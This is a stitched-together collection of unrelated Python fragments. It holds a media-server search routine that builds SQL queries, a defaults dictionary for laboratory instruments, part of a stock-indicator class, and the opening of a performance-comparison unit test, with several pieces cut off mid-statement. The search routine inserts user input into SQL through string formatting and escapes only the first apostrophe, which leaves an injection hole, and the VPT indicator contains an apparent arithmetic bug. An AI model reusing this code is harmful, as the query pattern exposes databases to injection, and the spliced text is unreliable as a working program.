# where_clause = where_clause + " AND te.air_date BETWEEN '{}' AND '{}'".format(inputDict["date"].split()[1], inputDict["date"].split()[3])
# else: #e.g., publish_date:2018-01-11
# where_clause = where_clause + " AND te.air_date = '{}'".format(inputDict["date"])
final_sql = sql_template_tvshowep + where_clause + sql_ending
elif inDict["mediaType"] == "all":
where_clausem = ""
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
if "year" in inDict:
where_clausem = where_clause + "AND " + "M.release_year {} ".format(inDict["year"])
final_sql = "(" + sql_template_movie + where_clausem + sql_ending+")"+ " UNION " + "(" + sql_template_tvshow + where_clause + sql_ending+")"
r = dictfetchall(cur,final_sql)
print(r)
cur.close() # Close the cursor
conn.close() # Close the connection to the db
return r
except:
# If there were any errors, return a NULL row printing an error to the debug
print("Error Couldn't Search for the Movie in Advanced Search")
cur.close() # Close the cursor
conn.close() # Close the connection to the db
return None
#####################################################
# Podcast Genre - Multi Term Search
#
#####################################################
def search_podcastep_podcast_multi(inputDict):
"""
Podcast – name of podcast and/or release date - Theresa
Podcast Ep – name of episode and/or release date
- name, publish_date, length
sample input:
mediaType: podcast, date : >2019-01-01
mediaType: all, date : 2019-01-01
mediaType: all, date : between 2018-01-01 and 2019-01-12, length: 4462
mediaType: podcastep, name: Fine Cotton Fiasco bonus episode
mediaType: all, date : between 2018-01-01 and 2019-01-01, length: > 300
"""
conn = database_connect()
if(conn is None):
return None
cur = conn.cursor()
sql_template_podcastep = """
SELECT distinct podep.media_id as item_id, podcast_episode_title as item_title, 'PodcastEp' as item_type
FROM mediaserver.podcastepisode podep LEFT OUTER JOIN
(mediaserver.mediaitemmetadata NATURAL JOIN mediaserver.metadata NATURAL JOIN mediaserver.metadatatype) mediamd
ON (podep.media_id = mediamd.media_id)
"""
sql_template_podcast = """
SELECT distinct pod.podcast_id as item_id, podcast_title as item_title, 'Podcast' as item_type
FROM mediaserver.podcast pod LEFT OUTER JOIN
(mediaserver.podcastmetadata NATURAL JOIN mediaserver.metadata NATURAL JOIN mediaserver.metadatatype) p_to_md
ON (pod.podcast_id = p_to_md.podcast_id)
"""
where_clause = " WHERE true" #podcast genre
endclause = " ORDER BY item_id"
if inputDict["mediaType"] == "podcastep":
if "name" in inputDict:
name = inputDict["name"].lower()
apostrophe_index = name.find("'")
if apostrophe_index >= 0:
name = name[:apostrophe_index] + "'" + name[apostrophe_index:]
where_clause = where_clause + " AND lower(podcast_episode_title) = '{}'".format(name)
if "date" in inputDict:
if inputDict["date"][0] == '>' or inputDict['date'][0] == '<': #e.g., publish_date:>2017-01-01
where_clause = where_clause + " AND podcast_episode_published_date {} '{}'".format(inputDict["date"][0], inputDict["date"][1:])
elif inputDict["date"][0:2] == '>=' or inputDict['date'][0:2] == '<=': #e.g., publish_date:>=2017-01-01
where_clause = where_clause + " AND podcast_episode_published_date {} '{}'".format(inputDict["date"][0:2], inputDict["date"][2:])
elif inputDict["date"].split()[0].lower() == 'between':
where_clause = where_clause + | |
<filename>VIP_modules/dictionaries/session.py
"""
This file lists all initial values that are used in building the VIP GUI.
We do so by assembling a large dictionary of dictionaries of dictionaries,
called 'Tree'. From this we construct the smaller 'default' dictionary of
dictionaries. The default session dictionary assembled in the VIP_class
definition is a copy of 'default'.
"""
################################################################################
try:
### This except-clause is needed if you want to execute this file directly
import dictionaries.hardware as hardware
except ImportError:
import hardware as hardware
print "(session.py, ImportError) It seems you executed the session file directly."
################################################################################ INSTRUMENT CLASSIFICATION
ZNB20s = ['ZNB_1'
,'ZNB_2'
]
SGS100As = ['SGS_31'
,'SGS_32'
,'SGS_33'
,'SGS_34'
,'SGS_35'
,'SGS_37'
,'SGS_40'
,'SGS_41'
]
################################################################################ MEASUREMENT INSTURMENTS
VNA = {'ZVL_1' : {'B_continous' : 'OFF' #,'Cont_off/on' : 'OFF'
,'F_data_form' : 'MLOG'
,'F_VNA_mode' : 'MLOG'
,'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_freq_source' : '15.5'
,'R_power_source' : '-10'
,'R_bandwidth' : '1'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_Sij' : 'S21'
,'F_unit_bandwidth' : 'MHz'
,'F_unit_freq' : 'MHz'
,'F_unit_freq_source' : 'MHz'
,'B_averaging' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
}
}
for instr_name in ZNB20s:
VNA[instr_name] = {'B_continous' : 'OFF' #,'Cont_off/on' : 'OFF'
,'F_data_form' : 'MLOG'
,'F_VNA_mode' : 'MLOG'
,'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_freq_source' : '15.5'
,'R_power_source' : '-10'
,'R_bandwidth' : '1'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_Sij' : 'S43'
,'F_unit_bandwidth' : 'MHz'
,'F_unit_freq' : 'MHz'
,'F_unit_freq_source' : 'MHz'
,'B_averaging' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
}
##########----------------------------------------------------------------------
SA = {'FSW_1' : {'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_bandwidth' : '1'
,'R_time_stop' : '10'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_unit_freq' : 'MHz'
,'F_unit_time' : 'ms'
,'F_unit_bandwidth' : 'MHz'
,'F_averaging_type' : 'LINear'
,'F_averaging_mode' : 'RMS'
,'B_continous' : 'OFF'
,'B_power_meas' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
,'B_averaging' : 'OFF'
}
}
##########----------------------------------------------------------------------
Osci = {'RTE1054_1' : {'N_sweep_points' : '5000'
,'N_resolution' : '2'
,'N_time_range' : str(int('5000') * int('2'))
,'S_time_unit' : 'E-12' # pico second
,'S_Acquire_mode' : 'RESolution'
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
Laser = {'Santec_1' : {'R_Wave_value' : '1550.135'
,'R_Freq_value' : '193.5300'
,'R_Pow_dBm_value' : '-10'
,'R_Pow_mW_value' : '0.1'
,'B_connect' : 'DONT'
,'B_Shutter' : 'SC'
,'F_freq_or_wave' : 'FREQ'
,'F_dBm_or_mW' : 'DBM'
}
}
##########----------------------------------------------------------------------
WM = {'WM1210_1' : {'S_device_key' : '<KEY>' ### Wavelengthmeter
,'R_sleep_time' : '0.2'
,'R_dWavelength' : '0.0'
,'R_dPower' : '0.0'
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
PM = {'Thorlabs_1' : {'N_averaging' : '100' ### Powermeter
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
Dig = {'ATS9870_1' : {'N_records_per_buffer' : '250'
,'N_buffers_per_acquisition' : '400'
,'N_trigger_level_1' : '160'
,'N_trigger_delay' : '0'
,'F_trigger_source_1' : 'External'
,'F_channelA_range' : '0.04'
,'F_channelB_range' : '0.04'
,'F_channelA_coupling' : 'AC'
,'F_channelB_coupling' : 'AC'
,'F_trigger_edge_1' : 'POSITIVE'
,'F_use_channel' : 'A'
,'N_sweep_points' : '404'
,'F_decimation' : '405'
,'R_intermediate_frequency' : '0' ###MHZ
,'R_filter_frequency' : '0' ###MHZ
,'B_connect' : 'DONT'
}
,'NI_DAQ_1' : {'N_buffers_per_acquisition' : '400'
,'B_connect' : 'DONT'
}
}
################################################################################ SOURCE INSTURMENTS
SG = {}
for instr_name in SGS100As:
SG[instr_name] = {'R_power_source' : '0'
,'R_freq_source' : '8'
,'R_phas_source' : '0'
,'F_unit_freq_source' : 'GHz'
,'B_output' : 'OFF'
,'B_reference_osci' : 'EXT'
,'B_connect' : 'DONT'
}
##########----------------------------------------------------------------------
AWG = {'H3344_1' : {'B_connect' : 'DONT'
,'R_amplitude_0' : '0.1'
,'R_amplitude_1' : '0.1'
,'R_amplitude_2' : '0.1'
,'R_amplitude_3' : '0.1'
,'R_offset_0' : "0"
,'R_offset_1' : "0"
,'R_offset_2' : "0"
,'R_offset_3' : "0"
,'B_use_trigger' : "ON"
,'FILE_PATH_waveform_0' : "E:\Measurement_Software\VIP\Data\Waveforms\dummy_name1.csv"
,'FILE_PATH_waveform_1' : "E:\Measurement_Software\VIP\Data\Waveforms\Generated_waveforms\gaussian_matilda_short004.csv"
,'FILE_PATH_waveform_2' : "E:\Measurement_Software\VIP\Data\Waveforms\dummy_name3.csv"
,'FILE_PATH_waveform_3' : "E:\Measurement_Software\VIP\Data\Waveforms\dummy_name4.csv"
}
}
for ch in hardware.range_H3344_channels:
k = 'B_channel_'+ch
AWG['H3344_1'][k] = 'OFF'
##########----------------------------------------------------------------------
NI_pulse = {'NI_pulse_1' : {'R_pulse_time' : '40'
,'F_unit_time' : 'ms'
,'F_use_config' : '2: Spec - Fridge - SA'
,'N_device' : '1'
,'N_port' : '0'
,'B_connect' : 'DONT'
}
}
for sk in NI_pulse:
NI_pulse[sk].update(hardware.NI_pulse)
for p in hardware.range_NI_pins:
NI_pulse[sk]['B_pin_'+p] = '0'
##########----------------------------------------------------------------------
Delft = {'Delft_1' : {'F_interface' : 'COM1'
,'F_polarity' : 'R_BIP'
,'F_channel' : '3'
,'B_connect' : 'DONT'
}
}
range_DACs = [str(i) for i in range(1, 1+int(hardware.Delft['N_DACs']))]
zero_init_mvolts = {'R_volt_channel_'+i : '0' for i in range_DACs}
for sk in Delft:
Delft[sk].update(hardware.Delft)
Delft[sk].update(zero_init_mvolts)
################################################################################ SCRIPTS
Scripts = {'Freq. vs. drive power' : {"Sweep_instr" : "SGS_33"
,"VNA_instr" : "ZNB_1"
,"R_freq_cavity_VNA" : "7.9524" # GHz
,"R_freq_span_cavity_VNA": "100" # Hz
,"R_power_SG" : "-40" # Hz
,"R_freq_start_SG" : "11.2" # GHz
,"R_freq_stop_SG" : "11.4" # GHz
,"R_freq_step_size_SG" : "0.1" # GHz
,"R_power_start_SG" : "-40" # GHz
,"R_power_stop_SG" : "-20" # GHz
,"R_power_step_size_SG" : "10" # GHz
}
,"Printer demo" : {'string_to_print' : '...this is the "Printer Demo" LineEdit string :)'}
,"Freq. query" : {'TITLE_instr_name' : 'SGS_32'}
,"Mixer calib." : {"center_freq" : "10"
,"int_freq" : "0"
,'R_amplitude' : "0.5"
,'LO_source' : 'SGS_31'
,'spec_source' : 'SGS_31'
}
,'Mixer-Dig VNA' : {"start_freq" : "6000000000"
,"stop_freq" : "12000000000"
,"points" : "301"
,"IF_freq" : "100000000"
,"source_LO" : 'SGS_32'
,"source_rf" : 'SGS_31'
}
,"Flux sweep" : {"vna_ip" : 'ZNB_1'
,"ssg_ip" : 'SGS_33'
,"com_port" : "1"
,"dac_port" : "1"
,"cav_freq" : "7.953"
,"span" : "10"
,"pow" : "-40"
,"start_freq" : "10"
,"stop_freq" : "12"
,"step_size_ssg" : "0.1"
,"start_flux" : "0"
,"stop_flux" : "1"
,"step_size_srs" : "0.1"
,"fn" : "test_file_name"
}
}
################################################################################ SWEEPS
Sweep_1 = {'Power sweep 1' : {'R__start' : '-20'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 1' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_33'
}
,'Voltage sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Degree'
,'F_axis_mode' : 'Linear'
,'F_instr_name' : 'SGS_32'
}
,'File sweep 1' : {'DIR__PATH' : 'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
,'From trace' : {
}
}
##########----------------------------------------------------------------------
Sweep_2 = {'Power sweep 2' : {'R__start' : '-99'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 2' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_34'
}
,'Voltage sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Deg'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_32'
}
,'File sweep 2' : {'DIR__PATH' : 'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
}
##########----------------------------------------------------------------------
Sweep_3 = {'Power sweep 3' : {'R__start' : '-20'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 3' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_34'
}
,'Voltage sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Deg'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_32'
}
,'File sweep 3' : {'DIR__PATH' : 'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
}
for ch in hardware.range_H3344_channels:
k = 'USE_channel_'+ch
Sweep_1['AWG sweep 1'][k] = 'DONT_USE'
Sweep_2['AWG sweep 2'][k] = 'DONT_USE'
Sweep_3['AWG sweep 3'][k] = 'DONT_USE'
################################################################################ CONTROL
Points = {'Power point' : {'F_instr_name' | |
DataFrame:
"""BASP indicator serves to identify buying and selling pressure."""
sp = ohlc["high"] - ohlc["close"]
bp = ohlc["close"] - ohlc["low"]
spavg = sp.ewm(span=period, adjust=adjust).mean()
bpavg = bp.ewm(span=period, adjust=adjust).mean()
nbp = bp / bpavg
nsp = sp / spavg
varg = ohlc["volume"].ewm(span=period, adjust=adjust).mean()
nv = ohlc["volume"] / varg
nbfraw = pd.Series(nbp * nv, name="Buy.")
nsfraw = pd.Series(nsp * nv, name="Sell.")
return pd.concat([nbfraw, nsfraw], axis=1)
@classmethod
def BASPN(cls, ohlc: DataFrame, period: int = 40, adjust: bool = True) -> DataFrame:
"""
Normalized BASP indicator
"""
sp = ohlc["high"] - ohlc["close"]
bp = ohlc["close"] - ohlc["low"]
spavg = sp.ewm(span=period, adjust=adjust).mean()
bpavg = bp.ewm(span=period, adjust=adjust).mean()
nbp = bp / bpavg
nsp = sp / spavg
varg = ohlc["volume"].ewm(span=period, adjust=adjust).mean()
nv = ohlc["volume"] / varg
nbf = pd.Series((nbp * nv).ewm(span=20, adjust=adjust).mean(), name="Buy.")
nsf = pd.Series((nsp * nv).ewm(span=20, adjust=adjust).mean(), name="Sell.")
return pd.concat([nbf, nsf], axis=1)
@classmethod
def CMO(
cls,
ohlc: DataFrame,
period: int = 9,
factor: int = 100,
column: str = "close",
adjust: bool = True,
) -> DataFrame:
"""
Chande Momentum Oscillator (CMO) - technical momentum indicator invented by the technical analyst <NAME>.
It is created by calculating the difference between the sum of all recent gains and the sum of all recent losses and then
dividing the result by the sum of all price movement over the period.
This oscillator is similar to other momentum indicators such as the Relative Strength Index and the Stochastic Oscillator
because it is range bounded (+100 and -100)."""
# get the price diff
delta = ohlc[column].diff()
# positive gains (up) and negative gains (down) Series
up, down = delta.copy(), delta.copy()
up[up < 0] = 0
down[down > 0] = 0
# EMAs of ups and downs
_gain = up.ewm(com=period, adjust=adjust).mean()
_loss = down.ewm(com=period, adjust=adjust).mean().abs()
return pd.Series(factor * ((_gain - _loss) / (_gain + _loss)), name="CMO")
@classmethod
def CHANDELIER(
cls,
ohlc: DataFrame,
short_period: int = 22,
long_period: int = 22,
k: int = 3,
) -> DataFrame:
"""
Chandelier Exit sets a trailing stop-loss based on the Average True Range (ATR).
The indicator is designed to keep traders in a trend and prevent an early exit as long as the trend extends.
Typically, the Chandelier Exit will be above prices during a downtrend and below prices during an uptrend.
"""
l = pd.Series(
ohlc["high"].rolling(window=long_period).max() - cls.ATR(ohlc, 22) * k,
name="Long.",
)
s = pd.Series(
ohlc["low"].rolling(window=short_period).min() + cls.ATR(ohlc, 22) * k,
name="Short.",
)
return pd.concat([s, l], axis=1)
@classmethod
def QSTICK(cls, ohlc: DataFrame, period: int = 14) -> Series:
"""
QStick indicator shows the dominance of black (down) or white (up) candlesticks, which are red and green in Chart,
as represented by the average open to close change for each of past N days."""
_close = ohlc["close"].tail(period)
_open = ohlc["open"].tail(period)
return pd.Series(
(_close - _open) / period, name="{0} period QSTICK.".format(period)
)
@classmethod
def TMF(cls, ohlcv: DataFrame, period: int = 21) -> Series:
"""Indicator by <NAME> which improves upon CMF.
source: https://user42.tuxfamily.org/chart/manual/Twiggs-Money-Flow.html"""
ohlcv["ll"] = [min(l, c) for l, c in zip(ohlcv["low"], ohlcv["close"].shift(1))]
ohlcv["hh"] = [
max(h, c) for h, c in zip(ohlcv["high"], ohlcv["close"].shift(1))
]
ohlcv["range"] = (
2 * ((ohlcv["close"] - ohlcv["ll"]) / (ohlcv["hh"] - ohlcv["ll"])) - 1
)
ohlcv["rangev"] = None
# TMF Signal Line = EMA(TMF)
# return TMF
raise NotImplementedError
@classmethod
def WTO(
cls,
ohlc: DataFrame,
channel_lenght: int = 10,
average_lenght: int = 21,
adjust: bool = True,
) -> DataFrame:
"""
Wave Trend Oscillator
source: http://www.fxcoaching.com/WaveTrend/
"""
ap = cls.TP(ohlc)
esa = ap.ewm(span=channel_lenght, adjust=adjust).mean()
d = pd.Series(
(ap - esa).abs().ewm(span=channel_lenght, adjust=adjust).mean(), name="d"
)
ci = (ap - esa) / (0.015 * d)
wt1 = pd.Series(ci.ewm(span=average_lenght, adjust=adjust).mean(), name="WT1.")
wt2 = pd.Series(wt1.rolling(window=4).mean(), name="WT2.")
return pd.concat([wt1, wt2], axis=1)
@classmethod
def FISH(cls, ohlc: DataFrame, period: int = 10, adjust: bool = True) -> Series:
"""
Fisher Transform was presented by <NAME>. It assumes that price distributions behave like square waves.
"""
from numpy import log, seterr
seterr(divide="ignore")
med = (ohlc["high"] + ohlc["low"]) / 2
ndaylow = med.rolling(window=period).min()
ndayhigh = med.rolling(window=period).max()
raw = (2 * ((med - ndaylow) / (ndayhigh - ndaylow))) - 1
smooth = raw.ewm(span=5, adjust=adjust).mean()
_smooth = smooth.fillna(0)
return pd.Series(
(log((1 + _smooth) / (1 - _smooth))).ewm(span=3, adjust=adjust).mean(),
name="{0} period FISH.".format(period),
)
@classmethod
def ICHIMOKU(
cls,
ohlc: DataFrame,
tenkan_period: int = 9,
kijun_period: int = 26,
senkou_period: int = 52,
chikou_period: int = 26,
) -> DataFrame:
"""
The Ichimoku Cloud, also known as Ichimoku Kinko Hyo, is a versatile indicator that defines support and resistance,
identifies trend direction, gauges momentum and provides trading signals.
Ichimoku Kinko Hyo translates into “one look equilibrium chart”.
"""
tenkan_sen = pd.Series(
(
ohlc["high"].rolling(window=tenkan_period).mean()
+ ohlc["low"].rolling(window=tenkan_period).mean()
)
/ 2,
name="TENKAN",
) ## conversion line
kijun_sen = pd.Series(
(
ohlc["high"].rolling(window=kijun_period).mean()
+ ohlc["low"].rolling(window=kijun_period).mean()
)
/ 2,
name="KIJUN",
) ## base line
senkou_span_a = pd.Series(
((tenkan_sen + kijun_sen) / 2), name="senkou_span_a"
) ## Leading span
senkou_span_b = pd.Series(
(
(
ohlc["high"].rolling(window=senkou_period).mean()
+ ohlc["low"].rolling(window=senkou_period).mean()
)
/ 2
),
name="SENKOU",
)
chikou_span = pd.Series(
ohlc["close"].shift(chikou_period).rolling(window=chikou_period).mean(),
name="CHIKOU",
)
return pd.concat(
[tenkan_sen, kijun_sen, senkou_span_a, senkou_span_b, chikou_span], axis=1
)
@classmethod
def APZ(
cls,
ohlc: DataFrame,
period: int = 21,
dev_factor: int = 2,
MA: Series = None,
adjust: bool = True,
) -> DataFrame:
"""
The adaptive price zone (APZ) is a technical indicator developed by <NAME>.
The APZ is a volatility based indicator that appears as a set of bands placed over a price chart.
Especially useful in non-trending, choppy markets,
the APZ was created to help traders find potential turning points in the markets.
"""
if not isinstance(MA, pd.Series):
MA = cls.DEMA(ohlc, period)
price_range = pd.Series(
(ohlc["high"] - ohlc["low"]).ewm(span=period, adjust=adjust).mean()
)
volatility_value = pd.Series(
price_range.ewm(span=period, adjust=adjust).mean(), name="vol_val"
)
# upper_band = dev_factor * volatility_value + dema
upper_band = pd.Series((volatility_value * dev_factor) + MA, name="UPPER")
lower_band = pd.Series(MA - (volatility_value * dev_factor), name="LOWER")
return pd.concat([upper_band, lower_band], axis=1)
@classmethod
def SQZMI(cls, ohlc: DataFrame, period: int = 20, MA: Series = None) -> DataFrame:
"""
Squeeze Momentum Indicator
The Squeeze indicator attempts to identify periods of consolidation in a market.
In general the market is either in a period of quiet consolidation or vertical price discovery.
By identifying these calm periods, we have a better opportunity of getting into trades with the potential for larger moves.
Once a market enters into a “squeeze”, we watch the overall market momentum to help forecast the market direction and await a release of market energy.
:param pd.DataFrame ohlc: 'open, high, low, close' pandas DataFrame
:period: int - number of periods to take into consideration
:MA pd.Series: override internal calculation which uses SMA with moving average of your choice
:return pd.Series: indicator calcs as pandas Series
SQZMI['SQZ'] is bool True/False, if True squeeze is on. If false, squeeeze has fired.
"""
if not isinstance(MA, pd.core.series.Series):
ma = pd.Series(cls.SMA(ohlc, period))
else:
ma = None
bb = cls.BBANDS(ohlc, period=period, MA=ma)
kc = cls.KC(ohlc, period=period, kc_mult=1.5)
comb = pd.concat([bb, kc], axis=1)
def sqz_on(row):
if row["BB_LOWER"] > row["KC_LOWER"] and row["BB_UPPER"] < row["KC_UPPER"]:
return True
else:
return False
comb["SQZ"] = comb.apply(sqz_on, axis=1)
return pd.Series(comb["SQZ"], name="{0} period SQZMI".format(period))
@classmethod
def VPT(cls, ohlc: DataFrame) -> Series:
"""
Volume Price Trend
The Volume Price Trend uses the difference of price and previous price with volume and feedback to arrive at its final form.
If there appears to be a bullish divergence of price and the VPT (upward slope of the VPT and downward slope of the price) a buy opportunity exists.
Conversely, a bearish divergence (downward slope of the VPT and upward slope of the price) implies a sell opportunity.
"""
hilow = (ohlc["high"] - ohlc["low"]) * 100
openclose = (ohlc["close"] - ohlc["open"]) * 100
vol = ohlc["volume"] / hilow
spreadvol = (openclose * vol).cumsum()
vpt = spreadvol + spreadvol
return pd.Series(vpt, name="VPT")
@classmethod
def FVE(cls, ohlc: DataFrame, period: int = 22, factor: int = 0.3) -> Series:
"""
FVE is a money | |
<reponame>allansrc/fuchsia
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import io
import json
import os
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import unittest
import numpy
import perfcompare
# Test case helper class for creating temporary directories that will
# be cleaned up when the test finishes.
class TempDirTestCase(unittest.TestCase):
def setUp(self):
self._on_teardown = []
def MakeTempDir(self):
temp_dir = tempfile.mkdtemp(
prefix='tmp_unittest_%s_' % self.__class__.__name__)
def tear_down():
shutil.rmtree(temp_dir)
self._on_teardown.append(tear_down)
return temp_dir
def tearDown(self):
for func in reversed(self._on_teardown):
func()
def WriteJsonFile(filename, json_data):
with open(filename, 'w') as fh:
json.dump(json_data, fh)
def ReadGoldenFile(filename):
with open(filename, 'r') as fh:
data = fh.read()
matches = list(re.finditer('\n\n### (.*)\n', data, re.M))
starts = [m.end() for m in matches]
ends = [m.start() for m in matches[1:]] + [len(data)]
for m, start, end in zip(matches, starts, ends):
yield m.group(1), data[start:end]
# Helper for checking against test expectations in a golden file.
# This provides an implementation of AssertCaseEq() that compares
# results against the golden file.
class GoldenDataInput(object):
def __init__(self, filename):
self._cases = dict(ReadGoldenFile(filename))
def AssertCaseEq(self, name, actual):
expected = self._cases[name]
if expected != actual:
raise AssertionError('"%s" != "%s"' % (actual, expected))
# This provides an implementation of AssertCaseEq() that updates the
# golden file with new expectations generated by the tests.
class GoldenDataOutput(object):
def __init__(self):
self._cases = {}
def AssertCaseEq(self, name, actual):
assert name not in self._cases, name
self._cases[name] = actual
def WriteFile(self, filename):
with open(filename, 'w') as fh:
for name, data in sorted(self._cases.items()):
fh.write('\n\n### %s\n%s' % (name, data))
GOLDEN_FILE = os.path.join(
os.path.dirname(__file__), 'perfcompare_test_output.txt')
GOLDEN = GoldenDataInput(GOLDEN_FILE)
def TestMain():
global GOLDEN
if '--generate' in sys.argv:
sys.argv.pop(sys.argv.index('--generate'))
GOLDEN = GoldenDataOutput()
try:
unittest.main()
finally:
GOLDEN.WriteFile(GOLDEN_FILE)
else:
unittest.main()
# Test data from a normal distribution, generated using the following code:
# ', '.join('%.4f' % random.gauss(0, 1) for _ in xrange(100))
TEST_VALUES = [
0.4171, 2.1056, -0.0223, -1.6592, 0.4766, -0.6405, 0.3488, 1.5729, 2.0654,
-0.1324, -0.8648, -0.2793, -0.7966, 0.2851, -0.9374, -2.0275, 0.8222,
-0.2396, -0.6982, 0.9067, 0.9416, -2.2870, -0.1868, 1.0700, -1.2531, 0.8455,
1.4755, 0.2979, 0.3441, 0.6694, -0.1808, -0.9038, 0.8267, -0.4320, -0.7166,
0.3757, -0.5135, -0.9497, 2.0372, -0.3364, 0.3879, -0.2970, 1.3872, 0.6538,
1.0674, 1.2349, -0.6873, -0.1807, 0.6867, -0.1150, -1.0526, -0.6853,
-0.5858, -1.8460, 1.6041, -1.1638, 0.5459, -1.6476, -0.8711, -0.9001,
0.0788, -0.8170, 0.2439, 0.0129, -0.8674, -1.1076, -0.0074, -0.6230,
-0.4761, -2.2526, 0.4906, -0.5001, -0.2050, 0.7623, -0.5511, -0.2837,
-0.8797, -0.5374, -1.2910, 0.9551, 0.4483, -0.6352, -0.3334, -0.5105,
0.1073, 2.9131, -0.4941, -0.2808, -0.2517, -1.9961, 0.9214, -0.6325,
-1.1895, 0.8118, 1.5424, 0.5601, -1.0322, 0.7135, -0.2780, -0.1128
]
def GenerateTestData(mean, stddev):
return [x * stddev + mean for x in TEST_VALUES]
# This is an example of a slow running time value for an initial run of a
# test. This should be skipped by the software under test.
SLOW_INITIAL_RUN = [1e6]
class FormatConfidenceIntervalTest(unittest.TestCase):
def test_confidence_interval_formatting(self):
Format = perfcompare.FormatConfidenceInterval
self.assertEqual(Format(12345.6789, 2222), '12346 +/- 2222')
self.assertEqual(Format(12345.6789, 0.02222), '12345.679 +/- 0.022')
self.assertEqual(Format(12345.6789, 0.07777), '12345.679 +/- 0.078')
self.assertEqual(Format(12345.6789, 0.09911), '12345.679 +/- 0.099')
# Corner case: rounding 0.09950 to 2 significant figures produces
# 0.100, which looks like 3 significant figures rather than 2.
self.assertEqual(Format(12345.6789, 0.09950), '12345.679 +/- 0.100')
self.assertEqual(Format(12345.6789, 2e-5), '12345.678900 +/- 0.000020')
# Corner case: the offset is a power of 10.
self.assertEqual(Format(12345.6789, 0.1), '12345.68 +/- 0.10')
self.assertEqual(Format(12345.6789, 0.01), '12345.679 +/- 0.010')
# Corner case: zero offset.
self.assertEqual(Format(12345.6789, 0), '12345.7 +/- 0')
